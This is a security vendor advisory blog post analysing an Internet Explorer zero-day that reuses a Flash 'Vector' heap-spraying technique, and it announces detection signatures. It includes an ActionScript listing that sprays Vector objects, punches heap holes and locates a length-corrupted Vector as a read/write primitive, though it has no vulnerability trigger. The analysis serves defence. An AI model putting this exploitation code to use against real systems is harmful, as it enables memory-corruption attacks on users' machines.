New Zero-Day Attack Copies Earlier Flash Exploitation

Late on July 10, Microsoft released a blog post disclosing that it was aware of a zero-day attack in the wild. The attack exploits an Internet Explorer vulnerability (CVE-2013-3163) that had been unpatched until this month's Patch Tuesday (July 9), the day before the disclosure; the timing may be only a coincidence. Although we do not know how long ago the attack began, the official fix is available now: apply the Microsoft patch if you have not done so.

McAfee Labs rapidly responded to the threat. While digging into the exploitation process, we realized that this attack leverages the same exploitation technique that we were the first to identify in an Adobe Flash zero-day attack in February. We call this technique Flash Vector exploitation. Our February blog post made a prediction that has held up well:

More important, the technique looks like a common exploitation approach to Flash Player. The vulnerability actually doesn't help much; it just overwrites a few bytes that are treated as the "element number" field of a specific ActionScript object. These traits show that the exploitation technique is not limited to this particular Flash vulnerability; it may apply to other Flash or non-Flash vulnerabilities.

Both attacks leverage a weakness in Flash Player's custom heap management, specifically in how it manages the backing storage of ActionScript "Vector.<>" objects: the object's length field lives in memory that an attacker-controlled write can reach, and once that field is enlarged, the Vector's bounds check no longer protects the memory that follows its buffer. During our analysis, we also found some minor differences between the two attacks:

  • Because the earlier attack was triggered by a Flash vulnerability, its exploitation included a step that frees a heap block ("leaving the hole") so that the memory the Flash bug overwrites ends up adjacent to a sprayed Vector. In the current case that step is unnecessary: the trigger is an IE vulnerability, and because IE and Flash use different heap managers, the IE bug can overwrite memory bytes owned by Flash's allocator directly.
  • In the earlier exploit, the zero day used a "Vector.<Number>()" object and corrupted its length field. The current exploit uses a "Vector.<uint>()" object (again corrupting its length field). For example, the following code sprays many "Vector.<uint>()" objects in memory:

[Image: vector_spraying1 – ActionScript snippet from the exploit that sprays Vector.<uint> objects]
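To make the technique concrete, here is an added ActionScript 3 illustration of the Vector spraying pattern described above. It is not the exploit's own code (which the post shows only as an image) and contains no vulnerability trigger; the class name, the element count 0x3F0, the object count 0x4000, the marker value and the helper names are assumptions chosen for illustration. The two variants discussed in the list are both covered: the hole-punching step is only needed when the trigger is itself a Flash bug, and is left disabled for the IE-triggered case.

```actionscript
package {
    import flash.display.Sprite;

    // Added illustration of Flash Vector spraying (example code, not the
    // exploit's own). No vulnerability is triggered here; the numeric
    // constants and helper names are assumptions.
    public class VectorSpray extends Sprite {
        // Each element is a 4-byte uint, so one Vector's backing buffer is
        // ELEMS*4 bytes preceded by a small header that holds "length".
        private static const ELEMS:uint  = 0x3F0;
        private static const COUNT:uint  = 0x4000;
        private static const MARKER:uint = 0x41414141;

        private var sprayed:Vector.<Vector.<uint>> = new Vector.<Vector.<uint>>();

        public function VectorSpray() {
            spray();

            // Flash-triggered variant only: free every other Vector so the
            // vulnerable Flash object is allocated into a hole next to a
            // surviving Vector header ("leaving the hole"). Not needed when
            // the trigger lives in IE's heap, as with CVE-2013-3163.
            // punchHoles();

            // ... the vulnerability would be triggered here, overwriting the
            // 4-byte length field of one sprayed Vector with a large value ...

            var victim:Vector.<uint> = findCorruptedVector();
            if (victim != null) {
                // Every index below the (now huge) length passes the bounds
                // check, so victim[i] reads and writes far past its buffer.
                trace("corrupted length: 0x" + victim.length.toString(16));
            }
        }

        // Fill the heap with many identically sized Vectors whose contents are
        // a recognizable marker, so headers land at predictable intervals.
        private function spray():void {
            for (var i:uint = 0; i < COUNT; i++) {
                var v:Vector.<uint> = new Vector.<uint>(ELEMS, true);
                for (var j:uint = 0; j < ELEMS; j++) {
                    v[j] = MARKER;
                }
                sprayed.push(v);
            }
        }

        // Drop references to every other Vector; the blocks are released once
        // the garbage collector runs (allocation pressure or System.gc()).
        private function punchHoles():void {
            for (var i:uint = 1; i < sprayed.length; i += 2) {
                sprayed[i] = null;
            }
        }

        // A Vector whose length no longer equals ELEMS is the one whose header
        // was overwritten; this is the check an exploit runs after the trigger.
        private function findCorruptedVector():Vector.<uint> {
            for (var i:uint = 0; i < sprayed.length; i++) {
                var v:Vector.<uint> = sprayed[i];
                if (v != null && v.length != ELEMS) {
                    return v;
                }
            }
            return null;
        }
    }
}
```

The length check at the end is the practical tell of the technique: a Vector whose `length` has changed without any ActionScript code resizing it is the one whose header was hit, and from that point the object's own indexing becomes a read/write primitive over adjacent memory. For defenders this is also why generic exploitation-prevention controls, rather than signatures for one trigger, are the durable answer to this class.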

McAfee Labs has released two UDS signatures to protect customers of our Network Security Platform against both the IE vulnerability and the exploitation technique. Signature "UDS-HTTP: Microsoft Internet Explorer CBlockElement bdo element tag Use After Free Vulnerability I" addresses the vulnerability, and "UDS-HTTP: Microsoft Internet Explorer CVE-2013-3163 Flash Exploitation" covers the Flash Vector exploitation. In addition, the generic buffer overflow prevention feature in our HIPS products stops the related attacks.

The author would like to thank Bing Sun, Chong Xu, and Xiaoning Li (Intel Labs) for their help with the analysis.